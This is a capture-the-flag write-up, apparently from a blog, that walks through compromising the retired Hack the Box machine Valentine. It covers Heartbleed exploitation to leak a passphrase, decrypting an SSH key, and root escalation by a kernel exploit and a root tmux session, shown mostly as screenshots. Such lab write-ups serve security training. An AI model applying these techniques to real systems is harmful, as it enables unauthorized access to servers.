VALENTINE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib5GzB4zJ9QRyMW1tCY0fvKOeg0jhmECnI6LuoGpwlv4rzDEq0XnSM7W3oDabjG6CSS7MMLkpSTZE6UrcHEaE6j-nJ9AuiQrsb3zajZsBWI-44HTNyc0_IdQHfg1t1FjsTvxfFP2xG5U-T/s1600/screenshot.39.jpg)
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Valentine, what is a retired machine from the Hack the Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Valentine's IP is 10.10.10.79:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxJm7hBSz7wV5iKFNrGAdRQRe_Toq3u2qqW_Gl48aJfd3lh-EYgUDTsVEL9KsoTOcEAZyl5u01N2U8OW7qAS9LCiKlSpbC8c4B8LxWpSXWYchDDQV8-26lG0iu3wHb1EY9Rw5yRfS3rrp0/s400/screenshot.41.jpg)
- Scanning with Nmap:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQlEELs9n8QWrr7vn0_QYHi_LSi-CwyGDeD0rZggN65F5RhG6BX3PLaDFVl9hoJlQ25unJChd0h8OutHXa84yXwfIhuc8v61ijxJ0nWni8NapE1rx-jbZIXM9wdGuUZrG9verQGKSV688w/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt9850pNRGcDnDB2mvFIZ4XuLazVROEfrRc6F_fJpb_d69e1cjUYCzEFcZnbLouvAyTSnz-xswdnRxGaHjzVAOmBMd-kOdBs_Etq4rNJBCIudXzXq0NOt5Zd-Z7488rrz-dtVUPAF_rB7_/s1600/screenshot.5.jpg)
- Connecting with the browser at port 80 the image is very reminiscent of the Heartbleed vulnerability icon:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm87M3w-BM3NwP2wdOHeFk0kaMrj98E9Cr5TrLezoy7rFE2BBIcz-c0CTMKrvaH3CGdxcBk9_1YhYgp83f_UVHYUkivHklNbgyPt3oASK0RBD8bLKvlYtoM8PuvhQBXMI5FxBNgKR-jpbL/s640/screenshot.4.jpg)
- Same thing with HTTPS at port 443:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_a9Q-lGoT93ghFMGQdEoCbUtn8vXDz95h1s5KQO7BPAVNYnqzC_9QbKA5Nchkl53r0sMf0sxXEjlKhNPv3t-KqaFXfDM36vuAP8Xf6RLrkG0iedBt7nQ-87_Al9Wi5BTRDSlGAS-9MPY/s640/screenshot.40.jpg)
- There is a lot of information available about Heartbleed vulnerability:
http://heartbleed.com/
https://en.wikipedia.org/wiki/Heartbleed
- Nmap script confirms the Heartbleed vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHemQf8_HcIXsHuUpFSzqFBMxt_mjZiuoiQ96Lpa6ZX6Mf5JAm7ZILXf1jMHV1fV3OerWX0KGhCGfuAyuifHAyexHYA3B4V_N2dkGXqGRYexZ30x51hE5xytY2V4DIfQHn6FCq6oewiKdD/s1600/screenshot.13.jpg)
- Dirbusting Valentine's web server:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOLrXOFz1VnoHQj0jOiUpsYDe2arTn8dN38rZrcaTMj5OlB1-P3kocmBUbjrJJDy4h96CZO0BWXX22rkEC48IGampbHCIotW_r1amw6mLEZUx15PznyA4KIPguczVFqDJl_Wm0-2TGoRj5/s1600/screenshot.6.jpg)
- Checking folder /encode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4CzjQK6aT8gu3dTu4Dpu7FGkI-sB6r4sRURak9fiOKMh6uroeepf2rBt-ste2ZI_9Iu2lFAzaU1cKhnHWc3qBxjwtXce-Ass0bVR96Qkc6XlhkZN9yxP98LgN1dUTpHtL8COFNxlW4khp/s1600/screenshot.11.jpg)
- Checking folder /decode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAwwbM9aJ5trvV077Lv4BSMcPQw13UgbUx-Kx3oppSp1MQ17w-fNhd_C-dVuYfJZPubeY37E0S-27sj-ZY9j3YUPea_hFLQ5PcVzvkH8VGejrdQeoPAS9kiK5uGZITAoHXZs3JmGBGRz_/s1600/screenshot.10.jpg)
- Going to /dev:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqkgJENT58raOKVWSUDZvTBbUFiz-NDxL6eYe0wbZ-eTlkTRrfcAjKwB_UJo4lt-HWq37heFvobXJ7p5AuXPI535CA6wux7yrOrq-H7B_n2u_uXMZtks9sL4ZblmOPnbnd3FwVYNfnnYnT/s1600/screenshot.7.jpg)
- Reading notes.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjmNNlZNRyYi0b8u5lY28RxnW0eiF2AEncoBYoNLtcYZDOGETHvvMVtrvaBtB2zgkG1Kbx36Xql_T-84OKz28iOT67PDndfF6XtnEO5BPQaCwO8VxWsbBjpGk2noVZe801dHhG0a5C0ehj/s1600/screenshot.8.jpg)
- Reading hype_key:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDy5cD0tTuK73m8Ojhu4d1K3JTbjC1UB8yLFZuzb9z7F99CygCBgNxJHP5DqdmH8HBv0T51B6X7sIjVzb7WtjsYnoCWid_Q69TiN6IAxcCa7mhMGm1ZbgVltCv-Y0qksfJjoLuATzs5he5/s1600/screenshot.9.jpg)
- Copying hype_key locally:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWjT3Yz6jhW1BoVqLmWvSKj943CxugTBZ4cL2YG71IExnzFkj9g5xvIkatiBPDI8Ouzpp_ashfY6BXXz0Z5JkkZteDt7p9J8hW7T_3e6eWPcO44tLRFzjdJMFpiTTZsP5j8CeKSdCjqnYZ/s1600/screenshot.12.jpg)
- Because hype_key is written with hexadecimal numbers let's decode it:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih2N79lh72PWf4OeciLF5r-ZeadzuNSrf8XNDUELGYmmrFdRnN90CqciLzUn36k7J6Iuu_f2465caPPAluI80f4aAfnMhem6qQwWexDcNVKy9uBE-VCzEN6w9egEuOXsBn_nl2l_A1UY_S/s1600/screenshot.14.jpg)
- It seems that we are dealing with an RSA Private key. Copying it locally:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFD0e7CcCLBiwEUou3dQpYWE1AGM3qdKawPgBqADDEc-yrVkqcESFEPRPKoWZh0E4-0E97RKOJ3ZORfiKy4T1QKXBjMbE_U_cZoEUFrHVfSIwOQTWMjtkGqF9uyMSKJITHbziINDszlU2s/s1600/screenshot.15.jpg)
3 - EXPLOITATION
- Looking for an exploit related to Heartbleed vulnerability:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-e4H1fDd64Di28e6ssfA-IU6SNhZAhmWc37eg4p2FYcutA1E2GguGDm7xI1DiYmR2X23mAsjnBC1knnY0p7DgKlrXo3UxrT2mFY4ZRa7PMGTq5YWcuU_kMLJfWbINNHdyHZGgFFbc41JU/s1600/screenshot.16.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0VWEtltmXb_hRdikIgcpzLt6R6mRQ_ilm4vZMYd22hezwmyYFdtVjxJpnlylFfcM5Ue0JF-v15kXqTQTN60xpNvDaWh5eOz9CovlM05FsMXM0t5qrQx9Abudw72tjE1R9oTP7TXV7uWqv/s1600/screenshot.17.jpg)
- Copying the Python script 32764.py to the working folder:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic-rouu8haFd8GifT80B_uLCSJJlVbosFmN1nB5Vv77zOQbZlyu_ZfBEZNSkH_77YJ2yj2Av5uJnDe02kQ6Mp9BhVYuZjFAIDa0YMKhutPdD_mNJzUxUHhjcO0emn4q7u1YxLcU-bTE6iy/s1600/screenshot.18.jpg)
- Now, launching the script against Valentine's IP:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCTIjY4JjYaWz_A1q7Ru2cvk2JhGYTRKwPmQ_V2Ph2HLekm-weBy4BXcPhJ_9PDgWxtBT_l9FdPInU83wqjxAVEX6Ya9GurHyIH28cS-kdN_6w29Ik95-ywXoIvkk8Bgn0dWdwlNFJOb-/s1600/screenshot.31.jpg)
..................................
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjamAqDN-8JyziIt-hkMw6ycKbjCHc4tzI-u4t6sSf5qeoibwz6rOZWRLfL9gNfUMKz6rl25T9Tluz_bWhXmARa1BtrLYcJyzypDpnYR7p_HHf9Y4GXfoG2OAwDUjUDHwj327ptK4mvC1JJ/s1600/screenshot.20.jpg)
- The answer includes a reference to a string encoded with Base64:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh6Fg4CJV8e84q5hRFKnwn063QR1KLAHnQICbEpzhIP1AV6bGVty1gPb4Gp6AMY_FErv-FmunlOgAVmkisYBnarvbQuoWltqmfrwSOtJJdOV39dCNPMzOyAxYAkgYImkS2shGdDOUZdLe8/s400/screenshot.32.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU7N51tXb_ZTMOw_nQ58GgxQnwQdtPahgJVZEP0BrtLZONUzJvMF2KsJTtT9wvgA4C1yWQfDX7TJ4-d4daJsimh3Mj81kcS2xvwIwx69yGKmkCqfl-fBHY6dt6bf6iqqFlylbs80Z9RCK-/s1600/screenshot.34.jpg)
- Decoding the string we get a plaint text string: heartbleedbelievethehype
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaYprBnJL2riaPZ9GlJa958p_0mDrIvbv2H6sb16y_UVfMr13WB7QmCcOJ2a8naDtf9G-f_5rpTdzbOgJxuLTvQlC9laborfEFRjgSLOy-cYbr0Ed4a2r5viBq5bcHi-F63DiFKNp7ZNkC/s1600/screenshot.37.jpg)
- Going back to the encrypted key, let's see whether openssl help to decrypt it by providing as password the string heartbleedbelievethehype:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgje8-dX-aWewgkNANtg7SMwRqPr3iSnv50gdE9N4xbGPC8ujGceJTjfvoFQB8-mxmT2wzGc6a80GAnk5k_O1719tB_EXOu9bah_zKjX959KoN34-QTjU8nlr7yRu6Xi9rejEkBpIfzbGwi/s1600/screenshot.21.jpg)
- The new decrypted ssh_key:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAIihuvq1_z623iv_6R7ZAZUgji847hiw2UuOf9AFhuX1iR-ZRtqCsYdEbXfAEUxSv0VqEFLE2JHn3ZfltJi9BXe-rWO1BxypZmnsmsqH7KJtL9l_jbPCKrlhFysF7IOaNG0zaohQZhfYl/s1600/screenshot.22.jpg)
- SSH-ing valentine with user hype's credentials:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZyZTsj_x03LJ1u6VO9hibMtgPqshY-hVZUnTbvJby4F7y0rXfv5k_Yf6h6vIoKgaucM6ALTyhvtplsQ8_mHE6_cvBNCKQA8ac-EDz8wVXgivAHzGmyfI3iwFVk4Z4GmOOrNAQmhRInHr0/s1600/screenshot.23.jpg)
- The remote shell is low privileged:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hLSg14ADN-l7AtJqXCasOSwC8e3IvieucW-ehnbxEEDZ5QzCihWg0a9EsSYrHUQoLzghjRRLFSLLJjw5uPrmu95FXf-byiqukZwDwfdouBJc6NmD9Jet8oYf6w2PzL6ld0UtVgbk1AvB/s1600/screenshot.24.jpg)
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN6rm9UAT1ys21oKpqnBW-ODk3_HVyeWc4W57wjTqPavLgeFvVoUKSAW-96Lwx2vdo1pE6fVTozE7xmhUDkIO0NlMpGR7TnxXRgjLGanXzvDI4-ULCH_vrJL02pVK9PDJEMqkBJxxzob8e/s1600/screenshot.25.jpg)
5 - PRIVILEGE ESCALATION
- Let's try two ways for Privilege Escalation:
5.1 - Kernel exploitation
- First, checking Operating System version and Kernel number:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNV9kblHFHklf1ir21RZxSGCkv56XatClgkpcyM6emLyIFikclqbOpg2LNUXWTkCWq3uz-9snvK5Om7vk2g4Q3x-__dsQolhghY4NWrVfB8pve5G363jXTZwjq8rJZCVOB5pPPoIb7At-I/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX17GjZcf-es_okwJZSI05OyaiU17jqHl6Lx5Dz6yLBcJN9sLx4G-b5YwwDP9Yd3HoOXl83swSJZ76C8JZYIHXnMNdnCixwCd4pEELasqEKHKhZAS0nDEgskNVEvbfxJElARfO7L6BkvRy/s1600/screenshot.4.jpg)
- There are some exploits for Linux 3.2 kernel version, for instance this one:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBk-wAT_wxf1Tcylbjx7RJT2oXEApGGSN2vnzXLiC3x6I8ycnRn0IidjtEzhmB09Ek-3rqynNRROAcxNrdJ6ZEEb29T1NNTBq1C8uhHyOjQjZtM6_LNGNn_INYTPupDxbWavxTr7lj5S3Y/s1600/screenshot.1.jpg)
- Downloading to Kali and transferring to Valentine:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTv7uWpGF3OUuSkuZsQiZlZ7-H3PPSjPsrohXXabgEKeMlxiP18gYwMZi2lZwMx8YL_2oTJPJyRcunHte2nqFzC9Bx4rJZPDVltjwF7ZD_OZHDfY9cp0QhLBlWli32eOYlWHBTl370fSQp/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQUmh1qjuWaq5lmn0z6QI5eyR0r8GPhN0o_9EDXqNVuMx-SJ0A0nlg9AEO58THrs3lGa_OlSNQVl9sVku5YVQ4cZT0MgebLPaCy9jGztZrEcHJpEsIzo7dpiQ-ZIUBpl8fy8yYAHG-TQko/s1600/screenshot.6.jpg)
- Compiling according to the instructions:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLS6ysgbTWkgf_pGymsRx7uibFUpiQE_p2Esj2djPgneRy82KB1SSRiNxhZPybQYMSh6EKBCkkSlklGyhydzloYGdtHAGNx4AcayEDluqtvYUL3LA-5F3MD7-XgzBMUjoaBgLQ0rX_48JG/s1600/screenshot.2.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioMWi4C0bBL4DyLVv71HHBV8k1ttaV5_PrfXHDq9sJTpzN8b5yI4YWG8xKIibtiwE3awYOLGc3BnHTgHDOu825ZJQuJeCHlac7HgzpJ_KA5ybjbCUOt7X7qaPJfghNk6FNIs4fKAUYkjnW/s1600/screenshot.7.jpg)
- Now, a new password must be entered, for instance hello:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE-RIisoZwqjjMw1XVfv6GHjH0JbXP116SnSsSWnisiG6Qn77ZHRzyY-jVjLp4ULgXkVayVOQpsWoBJMkGEfs4Z08bKY0HbMqBDss3a9fv_oMkUTApfbicS6yayceACthgH2j9Fnd4ukWe/s1600/screenshot.9.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWjChzjhgwJIoRKKHR_G8DlmSjdDzAPT-FO697WHq1rHxRjRNwV3IFezeRd2H5LpRPxcC2yFZ18LKUMoImYoiIX_ocw93e8b6kn3g2o2OxpSFE7EI01jqrwllIWDnc9nGkK7CPMUH71BdA/s1600/screenshot.8.jpg)
- Switching to the user firefart with the new password hello we get a root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBIAF-Dr_hJOtgiYPgObW6VlnTWpTmb-32pQBYaxA7_qf8W6X4SGYRgSEaxs-30oInFpwps-Pdvk7mQ80rtI7CjmlYCjrbZeaXFkACro0kAZEdPdzKYdvkAaV36EgaEeEgV9N5CLZnIuJ8/s1600/screenshot.11.jpg)
5.2 - Tmux
- Reading the hidden file .bash_history there is a reference to a tmux command:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwY9miZEu1AXMfFozvxTINtDatEPWZwe7soj_YZn6MulZRGSt7uV6m0ugGoZNrr0IIjZjvnmwOc787ivJZ5gXZ2VcX4v0e_dahkfH-ZTKHD6GsyOnI8UGqynbgeuZqdHRzeYifBjmGTMzO/s1600/screenshot.26.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij5OQoYLk8aTeVRT_4oG_RHSN2WfTuUTDD5LVGzH0KdnFiOP7p8PmLZzyUZGk82Z8u4CHOyv6uUGeeHYZWZzoZJD6GHAf5YPjM4sEb3Quz2DYXHhA9zRs63ot7fzhFZccg5i0ktKf31Wb1/s1600/screenshot.27.jpg)
- Also, ps aux confirms that there is a tmux session running as root:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieORE-boy-aMLtCnFoOBNv6fiObhOXDHT2scDrGuZHkMCD3Nv5bTolOVVHLhOu2HzbC99VnwXEkphSznreXdZVI661kyOo8ZZ65gCqCNwA2DxFY90R3rs_hBQ38zsSz81tsMk88cD6BdRF/s1600/screenshot.42.jpg)
- Finally, just running the tmux command found at .bash_history we get a remote root shell:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq3OFaIgRP7QFyjEbz_dJl015XSP06moVoJByz_H8BhKpI76IK_VvOJRUbVhIrR0Y5rEsaw5UfJMc8rQYB573k5ynv6IN-vpKEpe4AkWGi_atHepNnn5NMZscIbX1RwCaTnRzbXDWXG9Q8/s1600/screenshot.28.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqV52pF_dmZblbs8Gsufs81tYh1zBpr1VVK1yzStqgxPQolhxbR16ADhuNqb9czruy8EuSJrmemlJKdHW10PNXFkb06Iqv5yOid6n8UdyA3Z8wN1VPhW0Z2WXaKdqZiN_27m8PfPL4Zzqy/s1600/screenshot.29.jpg)
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia4K0HP3AOX6xvQnh-kncgUjJUTlqDE6uMEeiZDlSQak8s1FUVERLTwhKiRuFS92jU5agQhUIDiawiz7Em2EdB4_ayNFgHGzssfbuWOkrXnxx1_Ozc3aO7WMoWpnOG4nf9areNc7zOFQB_/s1600/screenshot.30.jpg)